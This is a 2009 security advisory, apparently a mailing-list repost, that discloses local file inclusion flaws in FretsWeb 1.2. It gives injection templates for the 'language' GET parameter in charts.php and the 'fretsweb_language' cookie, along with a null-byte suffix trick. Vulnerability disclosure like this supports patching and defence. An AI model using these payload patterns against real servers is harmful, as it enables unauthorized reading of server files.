Security Advisory: MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --FretsWeb 1.2-->

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [Full-disclosure] [NETRAGARD SECURITY ADVISORY] [< Safari 3.2.3 Arbitrary Code Execution + PoC ][NETRAGARD-
20090622]
  [Full-disclosure] [DSF-02-2009] - Zoki Catalog SQL Injection
  DirectAdmin <= v1.33.6 XSS vuln.
  (GET var 'name') BLIND SQL INJECTION EXPLOIT --FretsWeb 1.2-->

From: y3nh4ck3r_(at)_gmail.com <y3nh4ck3r_(at)_gmail.com>
Date: 21.06.2009
Subject: MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --FretsWeb 1.2-->

----------------------------------------------------------------
MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --FretsWeb 1.2-->
----------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/fretsweb/
-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/
-->DEMO: N/A
-->CATEGORY: CMS / Games/Entertainment
-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...
               is an improved version of FoFCS.It is meant for...
-->RELEASED: 2009-05-30

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)
-->AFFECT VERSION: CURRENT (MAYBE <= ?)
-->Discovered Bug date: 2009-06-02
-->Reported Bug date: 2009-06-02
-->Fixed bug date: 2009-06-14
-->Info patch: http://sourceforge.net/projects/fretsweb/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

Note: Of course use null byte (%00) when you want to include a file with different extension to "php"

###########################
///////////////////////////

LOCAL FILE INCLUSION (LFI):

///////////////////////////
###########################

<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>

[++] GET var --> 'language'

~~~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00

###############################
///////////////////////////////

INSECURE COOKIE HANDLING (LFI):

///////////////////////////////
###############################

[++] Cookie --> 'fretsweb_language'

~~~~~> fretsweb_language=[LFI]%00

#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################